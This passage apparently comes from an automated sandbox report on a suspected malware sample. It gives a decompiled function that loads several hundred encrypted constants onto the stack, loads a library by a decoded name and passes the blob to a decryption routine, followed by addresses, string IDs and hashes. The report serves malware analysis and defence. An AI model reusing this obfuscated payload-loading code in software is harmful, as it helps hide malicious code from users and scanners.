                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				char _v1560;
                  				struct HINSTANCE__* _t392;
                  
                  				_v1560 = 0x4befb69c;
                  				_v1556 = 0xe2a7d93;
                  				_v1552 = 0xec58315b;
                  				_v1548 = 0xf479b9e5;
                  				_v1544 = 0x3655e0b3;
                  				_v1540 = 0x1788529f;
                  				_v1536 = 0xf8a87d29;
                  				_v1532 = 0x6a1c103e;
                  				_v1528 = 0xa3a4c637;
                  				_v1524 = 0xdd4d869a;
                  				_v1520 = 0xda58f7da;
                  				_v1516 = 0xa4aa4a18;
                  				_v1512 = 0xf64937e7;
                  				_v1508 = 0xa4ae6a93;
                  				_v1504 = 0x4a93dd70;
                  				_v1500 = 0x15b491d3;
                  				_v1496 = 0xb70e4dcf;
                  				_v1492 = 0xfb7fcaa2;
                  				_v1488 = 0x5ce8c08f;
                  				_v1484 = 0x83c7a18c;
                  				_v1480 = 0x6c649979;
                  				_v1476 = 0x8a267553;
                  				_v1472 = 0x14352803;
                  				_v1468 = 0xf6f6795d;
                  				_v1464 = 0xcc94b246;
                  				_v1460 = 0xbe9f1468;
                  				_v1456 = 0x3ef68f3a;
                  				_v1452 = 0x8360e0ee;
                  				_v1448 = 0xdd8b73c8;
                  				_v1444 = 0xfc9700e;
                  				_v1440 = 0x718d1c8;
                  				_v1436 = 0xffb7254;
                  				_v1432 = 0x286ed90a;
                  				_v1428 = 0x1b23db2c;
                  				_v1424 = 0xda2233ed;
                  				_v1420 = 0xbc53fd27;
                  				_v1416 = 0xde98ddd2;
                  				_v1412 = 0xb4314b61;
                  				_v1408 = 0xea162a4;
                  				_v1404 = 0xc02a9ba2;
                  				_v1400 = 0x967ce52;
                  				_v1396 = 0xabfbe251;
                  				_v1392 = 0x175cb512;
                  				_v1388 = 0xf8447fac;
                  				_v1384 = 0x2eac2eac;
                  				_v1380 = 0xf4344c6a;
                  				_v1376 = 0xbbdcaee3;
                  				_v1372 = 0xe99636da;
                  				_v1368 = 0x13a7e5e1;
                  				_v1364 = 0xff3c9bed;
                  				_v1360 = 0x8dbfbd40;
                  				_v1356 = 0xb185ff34;
                  				_v1352 = 0xcace94c2;
                  				_v1348 = 0xc80d6527;
                  				_v1344 = 0xa606e2ad;
                  				_v1340 = 0x6ae37e45;
                  				_v1336 = 0x282fa05a;
                  				_v1332 = 0x88a6d551;
                  				_v1328 = 0x1ff98e41;
                  				_v1324 = 0x5afaf771;
                  				_v1320 = 0xebf0ac61;
                  				_v1316 = 0x51130de3;
                  				_v1312 = 0xa1336917;
                  				_v1308 = 0x7a2f88ee;
                  				_v1304 = 0x718b7c64;
                  				_v1300 = 0xf2ab104c;
                  				_v1296 = 0xb1a7a998;
                  				_v1292 = 0x268c77d7;
                  				_v1288 = 0x9a6fd234;
                  				_v1284 = 0x60166448;
                  				_v1280 = 0xe602cf3d;
                  				_v1276 = 0x71c5ac19;
                  				_v1272 = 0xd33a43b2;
                  				_v1268 = 0x27eb747f;
                  				_v1264 = 0x1470ea9a;
                  				_v1260 = 0xa144ffe1;
                  				_v1256 = 0xd6d9720b;
                  				_v1252 = 0x9286eb36;
                  				_v1248 = 0x2aefe3bd;
                  				_v1244 = 0xed564a2f;
                  				_v1240 = 0xa9426475;
                  				_v1236 = 0x2bf8a593;
                  				_v1232 = 0xd0a447e5;
                  				_v1228 = 0x48052515;
                  				_v1224 = 0x3e8ebb64;
                  				_v1220 = 0xfe618b29;
                  				_v1216 = 0x751b8d9a;
                  				_v1212 = 0xd44d92f4;
                  				_v1208 = 0x5d775a9c;
                  				_v1204 = 0x62856083;
                  				_v1200 = 0xf5056c81;
                  				_v1196 = 0x29043594;
                  				_v1192 = 0x4ba08155;
                  				_v1188 = 0x2b9a15db;
                  				_v1184 = 0x15929201;
                  				_v1180 = 0x3631bff8;
                  				_v1176 = 0x959afeae;
                  				_v1172 = 0x1b996608;
                  				_v1168 = 0x9f6b0905;
                  				_v1164 = 0x6541544e;
                  				_v1160 = 0x3b4276c2;
                  				_v1156 = 0x449b5732;
                  				_v1152 = 0xeeda9290;
                  				_v1148 = 0xdcaa8116;
                  				_v1144 = 0xa1baec1f;
                  				_v1140 = 0x1470c0f3;
                  				_v1136 = 0x3e6a5a1a;
                  				_v1132 = 0x3833bb5d;
                  				_v1128 = 0xdb45c3d4;
                  				_v1124 = 0x27574c46;
                  				_v1120 = 0xa80b0835;
                  				_v1116 = 0xfcd6c910;
                  				_v1112 = 0xe990762e;
                  				_v1108 = 0xe0d8e335;
                  				_v1104 = 0x34abe755;
                  				_v1100 = 0x56597a74;
                  				_v1096 = 0xb103ce43;
                  				_v1092 = 0xef319e25;
                  				_v1088 = 0x22a91b8d;
                  				_v1084 = 0xf82edbd2;
                  				_v1080 = 0x3b4b8d37;
                  				_v1076 = 0x338cfe68;
                  				_v1072 = 0xf29573ff;
                  				_v1068 = 0x563e81d6;
                  				_v1064 = 0x548c86c1;
                  				_v1060 = 0x4468b232;
                  				_v1056 = 0xede258c9;
                  				_v1052 = 0x7c8c7e70;
                  				_v1048 = 0xd17a549a;
                  				_v1044 = 0xaf47054c;
                  				_v1040 = 0x8e7aa5fb;
                  				_v1036 = 0xda162cad;
                  				_v1032 = 0x7f4adfe2;
                  				_v1028 = 0xb42a2fff;
                  				_v1024 = 0x7179f28c;
                  				_v1020 = 0xcf51a6c7;
                  				_v1016 = 0xb6332844;
                  				_v1012 = 0xfdcdaa4c;
                  				_v1008 = 0xb14c459d;
                  				_v1004 = 0x7564d49e;
                  				_v1000 = 0x8f70fe3c;
                  				_v996 = 0xdc36cd7d;
                  				_v992 = 0x63e63e71;
                  				_v988 = 0x5edb739d;
                  				_v984 = 0x1cd504ef;
                  				_v980 = 0x93b57070;
                  				_v976 = 0x28a54980;
                  				_v972 = 0x64ef1114;
                  				_v968 = 0xed02e6be;
                  				_v964 = 0xabe7464c;
                  				_v960 = 0xe34a9f4f;
                  				_v956 = 0x38e0f1e6;
                  				_v952 = 0xec04582b;
                  				_v948 = 0x61693d0f;
                  				_v944 = 0xe21a0b35;
                  				_v940 = 0xc48c0b6a;
                  				_v936 = 0xfc0bfcd2;
                  				_v932 = 0xe781bd04;
                  				_v928 = 0x148c9f07;
                  				_v924 = 0x29cccea2;
                  				_v920 = 0xae046087;
                  				_v916 = 0x170e2607;
                  				_v912 = 0xfb9e28d9;
                  				_v908 = 0xc5f3c745;
                  				_v904 = 0x2064696d;
                  				_v900 = 0xfffefc0b;
                  				_v896 = 0xf75d58e6;
                  				_v892 = 0xdd0c0350;
                  				_v888 = 0xee345fd5;
                  				_v884 = 0x15c0bc71;
                  				_v880 = 0xfc21594b;
                  				_v876 = 0xf7d17b82;
                  				_v872 = 0xc53fb9bc;
                  				_v868 = 0x3db78dd2;
                  				_v864 = 0x5aa3eff4;
                  				_v860 = 0x4ffb8986;
                  				_v856 = 0x679dc3d7;
                  				_v852 = 0xf57679b7;
                  				_v848 = 0xd4a33e35;
                  				_v844 = 0x17525c45;
                  				_v840 = 0x2f705952;
                  				_v836 = 0x4709a022;
                  				_v832 = 0xe1344555;
                  				_v828 = 0xd80a835f;
                  				_v824 = 0x615f5253;
                  				_v820 = 0x5433de81;
                  				_v816 = 0x54f130f8;
                  				_v812 = 0x4823fa93;
                  				_v808 = 0xb927d63b;
                  				_v804 = 0xa075442;
                  				_v800 = 0xf027a5bf;
                  				_v796 = 0x1ff6d87a;
                  				_v792 = 0x717d95e8;
                  				_v788 = 0xc7adf187;
                  				_v784 = 0x41178485;
                  				_v780 = 0xd28e7ea8;
                  				_v776 = 0xd30c5935;
                  				_v772 = 0x323cce37;
                  				_v768 = 0x3b66b84b;
                  				_v764 = 0x93a4a480;
                  				_v760 = 0xc6f91e4c;
                  				_v756 = 0x878d3e1c;
                  				_v752 = 0xacbe73e0;
                  				_v748 = 0x39411ffd;
                  				_v744 = 0x51956353;
                  				_v740 = 0xeae86d79;
                  				_v736 = 0x74761c39;
                  				_v732 = 0x61d7b190;
                  				_v728 = 0xa072a497;
                  				_v724 = 0x958dee7a;
                  				_v720 = 0x9e671c60;
                  				_v716 = 0xd2430678;
                  				_v712 = 0x94c08196;
                  				_v708 = 0x965ab2f9;
                  				_v704 = 0x29b1888a;
                  				_v700 = 0x32e7db29;
                  				_v696 = 0xc7764655;
                  				_v692 = 0x6f1caa55;
                  				_v688 = 0x9eb0d2f;
                  				_v684 = 0x880161c9;
                  				_v680 = 0xa1c00ce3;
                  				_v676 = 0xc1d28a66;
                  				_v672 = 0xcc72ca45;
                  				_v668 = 0x97b55c25;
                  				_v664 = 0x8558f7e3;
                  				_v660 = 0x8ac5a732;
                  				_v656 = 0x6245af98;
                  				_v652 = 0xabcc6957;
                  				_v648 = 0x7e544f4d;
                  				_v644 = 0x43da5efa;
                  				_v640 = 0x781609ef;
                  				_v636 = 0x4617ba68;
                  				_v632 = 0xdfef7616;
                  				_v628 = 0x999614b7;
                  				_v624 = 0xb1861e95;
                  				_v620 = 0xe7f3ecef;
                  				_v616 = 0x74d5be3b;
                  				_v612 = 0x3fc5e28;
                  				_v608 = 0x1dd16ad;
                  				_v604 = 0x1052e4f9;
                  				_v600 = 0x65c2038a;
                  				_v596 = 0xd0c421c0;
                  				_v592 = 0xbc4682ff;
                  				_v588 = 0x32e7b9aa;
                  				_v584 = 0xd10fbd07;
                  				_v580 = 0xedbcb66b;
                  				_v576 = 0x2000143;
                  				_v572 = 0xcb14edfd;
                  				_v568 = 0xcf05854d;
                  				_v564 = 0xa88f0fe2;
                  				_v560 = 0xb803256e;
                  				_v556 = 0xb644a825;
                  				_v552 = 0xeeba0c9d;
                  				_v548 = 0x388db315;
                  				_v544 = 0x76b2629a;
                  				_v540 = 0xf626cd97;
                  				_v536 = 0x5ffbfc65;
                  				_v532 = 0x63532dab;
                  				_v528 = 0xc99a8036;
                  				_v524 = 0x3db019be;
                  				_v520 = 0xb8a25e3b;
                  				_v516 = 0x27c55253;
                  				_v512 = 0x64213913;
                  				_v508 = 0x1fc02174;
                  				_v504 = 0x74194bd1;
                  				_v500 = 0xc2830dba;
                  				_v496 = 0x59201bb3;
                  				_v492 = 0xf0a50b26;
                  				_v488 = 0x30a58ab3;
                  				_v484 = 0xe5059002;
                  				_v480 = 0xf326a3d3;
                  				_v476 = 0x98f99278;
                  				_v472 = 0xe9d966bc;
                  				_v468 = 0xab4cde5d;
                  				_v464 = 0x808fb1a1;
                  				_v460 = 0xd56d9e3e;
                  				_v456 = 0x4fc3d42f;
                  				_v452 = 0xe97c9080;
                  				_v448 = 0x5fec54a8;
                  				_v444 = 0x554cc6e2;
                  				_v440 = 0x7ae3fc51;
                  				_v436 = 0x3db9e987;
                  				_v432 = 0x270657d8;
                  				_v428 = 0x91df6386;
                  				_v424 = 0xa06420f6;
                  				_v420 = 0xb645fca2;
                  				_v416 = 0x9c6867fb;
                  				_v412 = 0x519fe36b;
                  				_v408 = 0xb7531c61;
                  				_v404 = 0xf5fc84f3;
                  				_v400 = 0x26cd3d1f;
                  				_v396 = 0x472b53f7;
                  				_v392 = 0xf96b6641;
                  				_v388 = 0xabeb68fc;
                  				_v384 = 0xeff2f92;
                  				_v380 = 0x12bd2dda;
                  				_v376 = 0xad0b7b64;
                  				_v372 = 0x1ba50940;
                  				_v368 = 0xd9508423;
                  				_v364 = 0x5b6a112d;
                  				_v360 = 0x4c072a9e;
                  				_v356 = 0xcd632d88;
                  				_v352 = 0x86676816;
                  				_v348 = 0x11d5ce75;
                  				_v344 = 0x4d839846;
                  				_v340 = 0x61a20281;
                  				_v336 = 0x7d4b08cc;
                  				_v332 = 0xe75e3c98;
                  				_v328 = 0xa09673de;
                  				_v324 = 0x4fcdca3;
                  				_v320 = 0x87caecd;
                  				_v316 = 0x8bb0de23;
                  				_v312 = 0x8bb4e855;
                  				_v308 = 0xd5e4f17c;
                  				_v304 = 0x6ce7b55c;
                  				_v300 = 0x2917ee1f;
                  				_v296 = 0xb765a1eb;
                  				_v292 = 0x17313737;
                  				_v288 = 0x491b73e5;
                  				_v284 = 0x60893bf9;
                  				_v280 = 0x8ed66181;
                  				_v276 = 0xd3c82709;
                  				_v272 = 0x74742dcc;
                  				_v268 = 0xb70f62bb;
                  				_v264 = 0x46e9044d;
                  				_v260 = 0xddfb36c2;
                  				_v256 = 0x1c14621e;
                  				_v252 = 0x3bba477e;
                  				_v248 = 0x1f5f3936;
                  				_v244 = 0xb8113197;
                  				_v240 = 0x1a909f95;
                  				_v236 = 0x2ff6f937;
                  				_v232 = 0x906b0598;
                  				_v228 = 0xeb5ff201;
                  				_v224 = 0x6f534f00;
                  				_v220 = 0x396a258d;
                  				_v216 = 0xdc74f9cd;
                  				_v212 = 0x9606240;
                  				_v208 = 0xeece9328;
                  				_v204 = 0x98343d05;
                  				_v200 = 0x46089577;
                  				_v196 = 0x8ca5a500;
                  				_v192 = 0x5fa8daa2;
                  				_v188 = 0xfebc41a3;
                  				_v184 = 0x4f16be69;
                  				_v180 = 0x5fcd3ff2;
                  				_v176 = 0x290cab8a;
                  				_v172 = 0x9084f10f;
                  				_v168 = 0x21f4372d;
                  				_v164 = 0xf77c0e4f;
                  				_v160 = 0xee8b3883;
                  				_v156 = 0x9d87c954;
                  				_v152 = 0xb5dc9ad1;
                  				_v148 = 0x31d7efed;
                  				_v144 = 0x23271e7d;
                  				_v140 = 0x2030c0b1;
                  				_v136 = 0x89cc42fd;
                  				_v132 = 0x855c1fdb;
                  				_v128 = 0x4586f4e2;
                  				_v124 = 0x6c1867c5;
                  				_v120 = 0x2b50d8a6;
                  				_v116 = 0xd392eb31;
                  				_v112 = 0x5adcea22;
                  				_v108 = 0xb0c01b07;
                  				_v104 = 0xfc9581f8;
                  				_v100 = 0x8a3c0db7;
                  				_v96 = 0xf184c207;
                  				_v92 = 0xf7612506;
                  				_v88 = 0xc77cedd3;
                  				_v84 = 0x456eed47;
                  				_v80 = 0x4d7c6473;
                  				_v76 = 0xf66fe5bc;
                  				_v72 = 0x3b81c48e;
                  				_v68 = 0x4ca88e47;
                  				_v64 = 0xf1f7108e;
                  				_v60 = 0xb6ad32aa;
                  				_v56 = 0xa746cf25;
                  				_v52 = 0x76783488;
                  				_v48 = 0x8a52240d;
                  				_v44 = 0xf4ff14a7;
                  				_v40 = 0xf0d384e;
                  				_v36 = 0x88b9944;
                  				_v32 = 0x8289fea5;
                  				_v28 = 0xf70587d8;
                  				_v24 = 0xecf5125b;
                  				_v20 = 0x4b2bcabe;
                  				_v16 = 0x645459e0;
                  				_v12 = 0x8f09d154;
                  				_v8 = 0x7a530fa7;
                  				_t400 = E00401A52(0x412980, 0x72fc3a35);
                  				_t392 = LoadLibraryW(_t391); // executed
                  				 *0x4164f4 = _t392;
                  				L00401B09(_t400);
                  				_push(0x414e70);
                  				_push(0x4fb37d17);
                  				return E004012FF( *0x4164f4,  &_v1560, 0x185);
                  			}
                  0x0040967b
                  0x00409685
                  0x0040968f
                  0x00409699
                  0x004096a3
                  0x004096ad
                  0x004096b7
                  0x004096c1
                  0x004096cb
                  0x004096d5
                  0x004096df
                  0x004096e9
                  0x004096f3
                  0x004096fd
                  0x00409707
                  0x00409711
                  0x0040971b
                  0x00409725
                  0x0040972f
                  0x00409739
                  0x00409743
                  0x0040974d
                  0x00409757
                  0x00409761
                  0x0040976b
                  0x00409775
                  0x0040977f
                  0x00409789
                  0x00409793
                  0x0040979d
                  0x004097a7
                  0x004097b1
                  0x004097bb
                  0x004097c5
                  0x004097cf
                  0x004097d9
                  0x004097e3
                  0x004097ed
                  0x004097f7
                  0x00409801
                  0x0040980b
                  0x00409815
                  0x0040981f
                  0x00409829
                  0x00409833
                  0x0040983d
                  0x00409847
                  0x00409851
                  0x0040985b
                  0x00409865
                  0x0040986f
                  0x00409879
                  0x00409883
                  0x0040988d
                  0x00409897
                  0x004098a1
                  0x004098ab
                  0x004098b5
                  0x004098bf
                  0x004098c9
                  0x004098d3
                  0x004098dd
                  0x004098e7
                  0x004098f1
                  0x004098fb
                  0x00409905
                  0x0040990f
                  0x00409919
                  0x00409923
                  0x0040992d
                  0x00409937
                  0x00409941
                  0x0040994b
                  0x00409955
                  0x0040995f
                  0x00409969
                  0x00409973
                  0x00409982
                  0x00409991
                  0x0040999b
                  0x004099a5
                  0x004099af
                  0x004099b9
                  0x004099c3
                  0x004099cd
                  0x004099d7
                  0x004099e1
                  0x004099eb
                  0x004099f5
                  0x004099ff
                  0x00409a09
                  0x00409a13
                  0x00409a1d
                  0x00409a27
                  0x00409a31
                  0x00409a3b
                  0x00409a45
                  0x00409a4f
                  0x00409a59
                  0x00409a63
                  0x00409a6d
                  0x00409a77
                  0x00409a81
                  0x00409a8b
                  0x00409a95
                  0x00409a9f
                  0x00409aa9
                  0x00409ab3
                  0x00409abd
                  0x00409ac7
                  0x00409ad1
                  0x00409adb
                  0x00409ae2
                  0x00409ae9
                  0x00409af0
                  0x00409af7
                  0x00409afe
                  0x00409b05
                  0x00409b0c
                  0x00409b13
                  0x00409b1a
                  0x00409b21
                  0x00409b28
                  0x00409b2f
                  0x00409b36
                  0x00409b3d
                  0x00409b44
                  0x00409b4b
                  0x00409b52
                  0x00409b59
                  0x00409b60
                  0x00409b67
                  0x00409b6e
                  0x00409b75
                  0x00409b7c
                  0x00409b83
                  0x00409b8a
                  0x00409b91
                  0x00409b98
                  0x00409b9f
                  0x00409ba6
                  0x00409bad
                  0x00409bb4
                  0x00409bc0
                  0x00409bc3
                  0x00409bcb
                  0x00409bd0
                  0x00409be1
                  0x00409be6
                  0x00409bfc

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00409BC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: /$/JV$@b`$E~j$FLW'$GnE$MOT~$NTAe$RYp/$SR_a$UE4$[1X$mid $q>c$sd|M$tzYV$ym$YTd
                  • API String ID: 1029625771-3197268478
                  • Opcode ID: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction ID: a2473892be70d7853f5d3ab73c35abe6bfda1bb905b43dc05c267480b0676288
                  • Opcode Fuzzy Hash: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction Fuzzy Hash: 176295F48467698BDB61DF429E847CEBA75BB51345F6096C8C29C3B214CB710B82CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 83%
                  			E0040B6B5(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
